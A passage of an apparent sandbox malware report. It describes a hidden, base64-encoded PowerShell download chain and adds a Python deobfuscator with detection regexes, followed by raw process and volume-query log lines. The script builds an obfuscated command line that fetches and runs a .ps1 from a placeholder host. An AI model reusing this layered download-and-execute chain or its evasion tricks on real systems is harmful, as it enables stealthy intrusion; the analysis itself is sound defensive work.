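The process-creation entries above record one execution chain several times over: wscript.exe runs a WindowsUpdate_NNN.bat dropped in %APPDATA%, cmd.exe starts the 32-bit powershell.exe with -noprofile -windowstyle hidden -ep bypass, and the script passed with -Command is nothing but [Convert]::FromBase64String fed through UTF8.GetString. The second variant (-ex unrestricted -nop -w 1 with nested invoke-expression) hides even that much: the '::' separators are assembled from [char]0x3a and the quotes from [char]34 and [char]0x22, so neither "FromBase64String" nor a quoted blob appears literally on the command line. The base64 fragment at the top of this section decodes to the next stage, which calls the decoder through the reversed literal 'gnirtS46esaBmorF'[-1..-16] -join '', defines an AES-CBC/PKCS7 decryption helper, sleeps five seconds and executes a further .ps1 fetched with Invoke-WebRequest.

The Python below is an added example for this page; it is not code from Joe Sandbox, from the report or from the sample. It folds the [char] concatenation, un-reverses the member name, peels the base64 layers one invoke-expression at a time, runs a small set of indicator regexes over every layer, and checks the wscript -> cmd -> powershell ancestry seen for each powershell.exe here. The command line it operates on is constructed in build_sample() to mirror the report's layering; its inner stage, the stage.example.invalid URL and the indicator names are this example's own, not the real payload's.

```python
"""Peel and score layered PowerShell command lines of the kind recorded above.
Added example for this report page, not code from the sandbox or the malware.
The sample command line is CONSTRUCTED; inner stage and URL are placeholders."""
import base64
import re
from typing import List

# [char]N with N decimal or 0x-hex, used to spell ':' and '"' without typing them.
_CHAR = re.compile(r"\[char\]\s*(0x[0-9a-fA-F]+|\d+)")
# 'abc'[-1..-N] -join ''  is PowerShell's idiom for "reverse this string".
_REVERSED = re.compile(r"'([^']+)'\[-1\.\.-(\d+)\]\s*-join\s*''")
# First base64 argument handed to FromBase64String, single- or double-quoted.
_B64_ARG = re.compile(r"frombase64string\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.I)

_INDICATORS = {
    "exec_policy_bypass": re.compile(r"-(?:ep|ex|executionpolicy)\s+(?:bypass|unrestricted)\b", re.I),
    "hidden_window":      re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "no_profile":         re.compile(r"-no(?:p|profile)\b", re.I),
    "base64_decode":      re.compile(r"frombase64string", re.I),
    "char_code_concat":   _CHAR,
    "reversed_member":    _REVERSED,
    "invoke_expression":  re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download":       re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient", re.I),
}


def fold_char_concat(text: str) -> str:
    """Resolve [char]N tokens and join adjacent '...'+'...' literals as PowerShell's
    + operator would, so hidden operators become visible. (A [char] resolving to a
    quote character itself is not handled.)"""
    text = _CHAR.sub(lambda m: "'" + chr(int(m.group(1), 0)) + "'", text)
    return text.replace("'+'", "")


def unreverse_members(text: str) -> str:
    """Turn 'gnirtS46esaBmorF'[-1..-16] -join '' back into FromBase64String and
    reduce [Type]::(Name)(args) to [Type]::Name(args)."""
    def fix(m):
        s, n = m.group(1), int(m.group(2))
        return s[::-1][:n]          # indices -1..-n walk the string backwards
    text = _REVERSED.sub(fix, text)
    return re.sub(r"::\((\w+)\)", r"::\1", text)


def peel(cmdline: str, max_depth: int = 8) -> List[str]:
    """All layers, outermost first: the command line, then each decoded script
    that the previous layer would have handed to iex / invoke-expression."""
    layers, cur = [], cmdline
    for _ in range(max_depth):
        layers.append(cur)
        visible = unreverse_members(fold_char_concat(cur))
        m = _B64_ARG.search(visible)
        if not m:
            break
        try:
            cur = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break                   # binary stage (e.g. AES/GZIP blob): stop here
    return layers


def indicators(cmdline: str) -> List[str]:
    """Names of the indicators that fire on any layer of the command line."""
    return sorted({name for layer in peel(cmdline)
                   for name, rx in _INDICATORS.items() if rx.search(layer)})


def chain_is_suspicious(chain: List[str]) -> bool:
    """True when a Windows script host spawns cmd.exe which later spawns PowerShell,
    the ancestry recorded for every powershell.exe in this report."""
    names = [p.rsplit("\\", 1)[-1].lower() for p in chain]
    want = [{"wscript.exe", "cscript.exe"}, {"cmd.exe"}, {"powershell.exe", "pwsh.exe"}]
    i = 0
    for n in names:
        if i < len(want) and n in want[i]:
            i += 1
    return i == len(want)


# Constructed stand-in for the innermost stage (placeholder host, not the real one).
SAMPLE_STAGE2 = ("Start-Sleep -Seconds 5; "
                 "iex (Invoke-WebRequest -Uri 'https://stage.example.invalid/next.ps1')")


def build_sample() -> str:
    """Constructed command line with the same three layers as the report's entries."""
    b2 = base64.b64encode(SAMPLE_STAGE2.encode()).decode()
    stage1 = ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::"
              "('gnirtS46esaBmorF'[-1..-16] -join '')('" + b2 + "')))")
    b1 = base64.b64encode(stage1.encode()).decode()
    return ("powershell.exe -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; "
            "invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+"
            "'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'"
            + b1 + "'+[char]0x22+'))')))")


if __name__ == "__main__":
    for depth, layer in enumerate(peel(build_sample())):
        print(f"--- layer {depth} ---\n{layer}\n")
    print("indicators:", ", ".join(indicators(build_sample())))
```

peel() stops as soon as a decoded layer is not UTF-8 text, which is where a real sample of this family hands over to its AES/GZIP helper; at that point the key and IV visible in the decoded script (the report's fragment passes both as base64 literals) are what an analyst feeds to the next tool. Scoring every layer rather than only the outer command line is what makes the reversed-string and download indicators fire: neither is present in the process-creation event itself.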
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcq8
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC46000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcq
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [ -- Program Manager -
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [ -- Program Manager --
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcqpgq
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcq\
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC46000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcqly
                  Source: powershell.exe, 0000000D.00000002.3585975750.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [ -- Program Manager -- ]
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager,
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcq(
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcqh
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [ -- Program Manager --THhq0E
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcq,
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC46000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcq<c
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A91C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [ -- Program Manager --LRcq$J
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcqP
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcq0
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRcqp
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\cq
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [ -- Program Manager -- L&z
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
